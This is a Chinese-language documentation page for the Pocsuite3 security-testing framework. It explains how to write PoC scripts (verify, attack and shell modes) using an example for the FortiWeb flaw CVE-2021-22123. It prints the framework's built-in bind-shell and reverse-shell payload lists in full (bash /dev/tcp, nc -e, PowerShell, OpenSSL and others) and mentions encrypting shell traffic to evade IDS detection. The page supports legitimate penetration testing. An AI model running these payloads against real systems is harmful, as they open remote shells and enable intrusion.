Skip to content
On this page

PoC python 脚本编写步骤

本小节介绍 PoC python 脚本编写。

Pocsuite3 仅支持 Python 3.x,如若编写 Python3 格式的 PoC,需要开发者具备一定的 Python3 基础。

从 0 到 1

  1. 首先新建一个 *.py 文件,文件名应当符合 《PoC 命名规范》

  2. pocsuite3.api 导入待用的类和方法,编写 PoC 实现类 DemoPOC,继承自 PoCBase 类。

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class DemoPOC(POCBase):
    ...
  1. 填写 PoC 信息字段,请认真填写所有基本信息字段

TIP

这些字段都不是必须的,也可留空

    vulID = '99335'  # Seebug 漏洞收录 ID,如果没有则为 0
    version = '1'  # PoC 的版本,默认为 1
    author = 'seebug'  # PoC 的作者
    vulDate = '2021-8-18'  # 漏洞公开日期 (%Y-%m-%d)
    createDate = '2021-8-20'  # PoC 编写日期 (%Y-%m-%d)
    updateDate = '2021-8-20'  # PoC 更新日期 (%Y-%m-%d)
    references = ['https://www.seebug.org/vuldb/ssvid-99335']  # 漏洞来源地址,0day 不用写
    name = 'Fortinet FortiWeb 授权命令执行 (CVE-2021-22123)'  # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> <cve编号>
    appPowerLink = 'https://www.fortinet.com'  # 漏洞厂商主页地址
    appName = 'FortiWeb'  # 漏洞应用名称
    appVersion = '<=6.4.0'  # 漏洞影响版本
    vulType = 'Code Execution'  # 漏洞类型,参见漏洞类型规范表
    desc = '/api/v2.0/user/remoteserver.saml接口的name参数存在命令注入'  # 漏洞简要描述
    samples = ['http://192.168.1.1']  # 测试样列,就是用 PoC 测试成功的目标
    install_requires = ['BeautifulSoup4:bs4']  # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
    pocDesc = ''' poc的用法描述 '''
    category = POC_CATEGORY.EXPLOITS.WEBAPP  # PoC 的分类
    protocol = POC_CATEGORY.PROTOCOL.HTTP  # PoC 的默认协议,方便对 url 格式化
    protocol_default_port = 8443  # 目标的默认端口,当提供的目标不包含端口的时候,方便对 url 格式化
    dork = {'zoomeye': 'deviceState.admin.hostname'}  # 搜索 dork,如果运行 PoC 时不提供目标且该字段不为空,将会调用插件从搜索引擎获取目标。
    suricata_request = '''http.uri; content: "/api/v2.0/user/remoteserver.saml";'''  # 请求流量 suricata 规则
    suricata_response = ''  # 响应流量 suricata 规则
  1. 编写验证模式
def _verify(self):
      output = Output(self)
      # 验证代码
      if result:  # result是返回结果
          output.success(result)
      else:
          output.fail('target is not vulnerable')
      return output

output 为 Pocsuite3 标准输出 API,如果要输出调用成功信息则使用 output.success(result),如果要输出调用失败则 output.fail(),系统自动捕获异常,不需要 PoC 里处理捕获,如果 PoC 里使用 try...except 来捕获异常,可通过output.error('Error Message') 来传递异常内容,建议直接使用 PoCBase 中的 parse_output() 通用结果处理函数对 _verify_attack 结果进行返回。

def _verify(self, verify=True):
    result = {}
    ...

    return self.parse_output(result)

# PoCBase
def parse_output(self, result):
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail()
    return output

TIP

通过 self.parse_output(result) 返回结果,result 为字典类型。如果 result 不为空,则会返回成功信息(即 PoC 验证成功),否则返回失败。在写 PoC 时,确保验证成功后再给 result 赋值并返回即可。

  1. 编写攻击模式

攻击模式可以对目标进行 getshell,查询管理员帐号密码等操作,定义它的方法与验证模式类似。

def _attack(self):
    output = Output(self)
    result = {}
    # 攻击代码

和验证模式一样,攻击成功后需要把攻击得到结果赋值给 result 变量并调用 self.parse_output(result)返回结果。

TIP

如果该 PoC 没有攻击模式,可以在 _attack() 函数下加入一句 return self._verify() 这样你就无需再写 _attack() 函数了。

  1. 编写 shell 模式

Pocsuite3 在 shell 模式会默认监听 6666 端口,编写对应的攻击代码,让目标执行反向连接运行 Pocsuite3 系统 IP 的 6666 端口即可得到一个 shell。

def _shell(self):
    cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
    # 攻击代码 execute cmd

shell 模式下,只能运行单个 PoC 脚本,控制台会进入 shell 交互模式执行命令及输出。

1.8.5 版本开始,Pocsuite3 支持 bind shell。shell 模式和原来的操作方式一致,也需要指定监听 ip 和端口,监听 ip 可以是本地任意 ip,也可以是远程服务器 ip。

bind shell 的实现位于 ./pocsuite3/modules/listener/bind_tcp.py,原理是实现了一个中间层,一端连接漏洞目标的 bind shell(如 telnet 服务、nc 启动的 shell、php 一句话等),另一端连接用户指定的监听 ip 和端口,如此一来,shell 模式可以不受网络环境限制,支持在内网使用。

目前支持三种 bind shell,使用场景如下:

bind_shell:通用方法,在 shell 模式中直接调用 return bind_shell(self, rce_func) 即可,非常便捷。针对有回显的漏洞,在 PoC 中实现一个 rce(函数名可自定义)方法,函数参数为命令输入,输出为命令输出。如果漏洞无回显,也可以通过写一句话转为有回显的。值得一提的是,用户也可以在 rce 方法中实现流量的加解密以逃避 IDS 检测。

bind_tcp_shell:对 tcp 绑定型 shell 的原生支持,在 shell 模式中 return bind_tcp_shell(bind_shell_ip, bind_shell_port)

bind_telnet_shell:对 telnet 服务的原生支持,在 shell 模式中 return bind_telnet_shell(ip, port, username, password)

简单举几个例子,telnet 弱口令 shell 模式实现,实际只需要一行代码:

def _shell(self):
    return bind_telnet_shell(ip, port, 'iot', '***')

php shell 模式,在目标写入一句话,然后在 _rce 方法中实现了流量的 AES 加解密:

值得一提的是,针对有回显的漏洞,只要在 PoC 中实现一个 _exploit 方法,就可轻松实现 Pocsuite3 的 _verify_attack_shell 三种模式,如下:

# 重写这个方法
def _exploit(self, cmd='id'):
    result = ''
    res = requests.get(self.url)
    logger.debug(res.text)
    result = res.text
    return result

# 验证漏洞存在
def _verify(self):
    result = {}
    if not self._check():
        return self.parse_output(result)

    flag = random_str(10)
    cmd = f'echo {flag}'
    res = self._exploit(cmd)
    if flag in res:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo'][cmd] = res
    return self.parse_output(result)

def _options(self):
    o = OrderedDict()
    o['cmd'] = OptString('id', description='The command to execute')
    return o

# 从命令行参数获取用户命令,并输出命令执行结果
def _attack(self):
    result = {}
    if not self._check():
        return self.parse_output(result)

    cmd = self.get_option('cmd')
    res = self._exploit(cmd)
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = self.url
    result['VerifyInfo'][cmd] = res
    return self.parse_output(result)

# 交互 shell 模式
def _shell(self):
    return bind_shell(self, '_exploit')

1.8.6 版本开始,Pocsuite3 支持加密的 shell。PoC 中使用 openssl 的反弹命令(也可以用代码反弹),并且在运行时指定 --tls 选项。

可以看到,通信流量加密了:

Pocsuite3 自带的 Payload 如下:

In [1]: from pocsuite3.api import BIND_PAYLOAD, REVERSE_PAYLOAD

In [2]: BIND_PAYLOAD.__dict__
Out[2]:
mappingproxy({'__module__': 'pocsuite3.modules.listener.bind_tcp',
              'NODE': 'node -e \'sh=child_process.spawn("/bin/sh");net.createServer(function(client){{client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}}).listen("{0}")\'',
              'NC': 'nc -l -p {0} -e /bin/sh',
              'SOCAT': 'socat TCP-LISTEN:{0},reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane',
              'PYTHON': 'python -c \'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",{0}));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])\'',
              'PERL': 'perl -e \'use Socket;$p={0};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");}};\'',
              'PHP': 'php -r \'$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",{0});socket_listen($s,1);$cl=socket_accept($s);while(1){{if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){{$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}}}\'',
              'RUBY': 'ruby -rsocket -e \'exit if fork;s=TCPServer.new("{0}");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){{|io|c.print io.read}}end;end\'',
              'NC2': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lvp {0} >/tmp/f',
              'AWK': 'awk \'BEGIN{{s="/inet/tcp/{0}/0/0";do{{if((s|&getline c)<=0)break;if(c){{while((c|&getline)>0)print $0|&s;close(c)}}}} while(c!="exit")close(s)}}\'',
              'TELNETD': 'telnetd -l /bin/sh -p {0}',
              'NC3': 'rm -rf /tmp/f;mkfifo /tmp/f||mknod /tmp/f p;(nc -l -p {0}||nc -l {0})0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f',
              'R': 'R -e "s<-socketConnection(port={0},blocking=TRUE,server=TRUE,open=\'r+\');while(TRUE){{writeLines(readLines(pipe(readLines(s,1))),s)}}"',
              '__dict__': <attribute '__dict__' of 'BIND_PAYLOAD' objects>,
              '__weakref__': <attribute '__weakref__' of 'BIND_PAYLOAD' objects>,
              '__doc__': None})

In [3]: REVERSE_PAYLOAD.__dict__
Out[3]:
mappingproxy({'__module__': 'pocsuite3.modules.listener.reverse_tcp',
              'NC': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f',
              'NC2': 'nc -e /bin/sh {0} {1}',
              'NC3': 'rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p',
              'BASH0': 'sh -i >& /dev/tcp/{0}/{1} 0>&1',
              'BASH': "bash -c 'sh -i >& /dev/tcp/{0}/{1} 0>&1'",
              'BASH2': "bash -c 'sh -i &gt;&amp; /dev/tcp/{0}/{1} 0&gt;&amp;1'",
              'TELNET': 'rm -rf /tmp/p;mkfifo /tmp/p||mknod /tmp/p p;telnet {0} {1} 0</tmp/p|/bin/sh 1>/tmp/p',
              'PERL': 'perl -e \'use Socket;$i="{0}";$p={1};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}};\'',
              'PYTHON': 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{0}",{1}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',
              'PHP': 'php -r \'$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");\'',
              'RUBY': 'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("{0}","{1}");while(cmd=c.gets);IO.popen(cmd,"r"){{|io|c.print io.read}}end\'',
              'JAVA': 'r = Runtime.getRuntime()\np = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{0}/{1};cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])\np.waitFor()',
              'POWERSHELL': "$client = New-Object System.Net.Sockets.TCPClient('{0}',{1});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([textencoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()",
              'OPENSSL': 'rm -rf /tmp/s;mkfifo /tmp/s||mknod /tmp/s p;/bin/sh -i </tmp/s 2>&1|openssl s_client -quiet -connect {0}:{1}>/tmp/s;rm -rf /tmp/s',
              'PHP_SSL': 'php -r \'$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://{0}:{1}",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){{while($l=fgets($s)){{exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}}}\'&',
              'NC4': 'nc {0} {1} -e /bin/sh',
              'BASH3': "bash -c '0<&173-;exec 173<>/dev/tcp/{0}/{1};sh <&173 >&173 2>&173'",
              'TELNET2': 'rm -f /tmp/p; mknod /tmp/p p && telnet {0} {1} 0/tmp/p',
              'NC5': 'rm -rf /tmp/p;mkfifo /tmp/p||mknod /tmp/p p;nc {0} {1} 0</tmp/p|/bin/sh 1>/tmp/p',
              'LUA': 'lua -e "local s=require(\'socket\');local t=assert(s.tcp());t:connect(\'{0}\',{1});while true do local r,x=t:receive();local f=assert(io.popen(r,\'r\'));local b=assert(f:read(\'*a\'));t:send(b);end;f:close();t:close();"',
              'PERL_SSL': 'perl -e \'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"{0}:{1}",SSL_verify_mode=>0);while(sysread($c,$i,8192)){{syswrite($c,`$i`);}}\'',
              'RUBY2': 'ruby -rsocket -e\'f=TCPSocket.open("{0}",{1}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'',
              'RUBY_SSL': 'ruby -rsocket -ropenssl -e \'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("{0}","{1}")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){{|io|c.print io.read}}end\'',
              'NCAT_SSL': 'ncat -e /bin/sh --ssl {0} {1}',
              '__dict__': <attribute '__dict__' of 'REVERSE_PAYLOAD' objects>,
              '__weakref__': <attribute '__weakref__' of 'REVERSE_PAYLOAD' objects>,
              '__doc__': None})


In [8]: REVERSE_PAYLOAD.BASH.format('127.0.0.1', 6666)
Out[8]: "bash -c 'sh -i >& /dev/tcp/127.0.0.1/6666 0>&1'"
  1. 结果返回

不管是验证模式还是攻击模式,返回结果 result 中的 key 值请按照下面的规范来写,result 各字段意义请参见《PoC 结果返回规范》

'Result': {
   'DBInfo': {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx', 'Uid': 'xxx', 'Groupid': 'xxx'},
   'ShellInfo': {'URL': 'xxx', 'Content': 'xxx'},
   'FileInfo': {'Filename': 'xxx', 'Content': 'xxx'},
   'XSSInfo': {'URL': 'xxx', 'Payload': 'xxx'},
   'AdminInfo': {'Uid': 'xxx', 'Username': 'xxx', 'Password': 'xxx'},
   'Database': {'Hostname': 'xxx', 'Username': 'xxx', 'Password': 'xxx', 'DBname': 'xxx'},
   'VerifyInfo': {'URL': 'xxx', 'Postdata': 'xxx', 'Path': 'xxx'},
   'SiteAttr': {'Process': 'xxx'},
   'Stdout': 'result output string'
}
  1. 注册 PoC 实现类

在类的外部调用 register_poc() 方法注册 PoC 类

class DemoPOC(POCBase):
    # POC内部代码

# 注册 DemoPOC 类
register_poc(DemoPOC)

以上,我们从 0 到 1 开发了一个 PoC,然后就是搭建漏洞靶场进行 PoC 调试了。

自动生成模版

以上过程有点繁琐,Pocsuite3 >=1.9.4 版本支持使用 -n--new 参数自动生成 PoC 模版。

可阅读:实战 PoC 开发

──(kali㉿kali)-[/tmp/]
└─$ pocsuite -n                            

,------.                        ,--. ,--.       ,----.   {1.9.6-aad0be3}
|  .--. ',---. ,---.,---.,--.,--`--,-'  '-.,---.'.-.  |
|  '--' | .-. | .--(  .-'|  ||  ,--'-.  .-| .-. : .' <
|  | --'' '-' \ `--.-'  `'  ''  |  | |  | \   --/'-'  |
`--'     `---' `---`----' `----'`--' `--'  `----`----'   https://pocsuite.org
[*] starting at 20:40:34

You are about to be asked to enter information that will be used to create a poc template.
There are quite a few fields but you can leave some blank.
For some fields there will be a default value.
-----
Seebug ssvid (eg, 99335) [0]: 
PoC author (eg, Seebug) []: 
Vulnerability disclosure date (eg, 2021-8-18) [2022-07-14]: 
Advisory URL (eg, https://www.seebug.org/vuldb/ssvid-99335) []: 
Vulnerability CVE number (eg, CVE-2021-22123) []: 
Vendor name (eg, Fortinet) []: 
Product or component name (eg, FortiWeb) []: 
Affected version (eg, <=6.4.0) []: 
Vendor homepage (eg, https://www.fortinet.com) []: 

0    Arbitrary File Read
1    Code Execution
2    Command Execution
3    Denial Of service
4    Information Disclosure
5    Login Bypass
6    Path Traversal
7    SQL Injection
8    SSRF
9    XSS

Vulnerability type, choose from above or provide (eg, 3) []: 
Authentication Required (eg, yes) [no]: 
PoC name [Pre-Auth Other]: 
Filepath in which to save the poc [./20220714_pre-auth_other.py]
[20:40:36] [INFO] Your poc has been saved in ./20220714_pre-auth_other.py :)
...

最简化 PoC 模版

1.9.8 版本开始,基类 POCBase 为 PoC 的所有属性设置了默认值,写 PoC 时可以不写任何属性字段,简化 PoC 的开发。

from pocsuite3.api import *

class TestPOC(POCBase):
    # 为了 PoC 的区分,建议提供 name 属性
    # name = ''
    def _verify(self):
        result = {}
        # 验证代码
        return self.parse_output(result)


register_poc(TestPOC)

YAML 格式 PoC

2.0.0 版本开始,Pocsuite3 支持了 YAML 格式的 PoC,兼容 nuclei,可以直接使用 nuclei templates

YAML PoC 模版开发可参考:nuclei-templating-guide

Released under the GPLv2 License.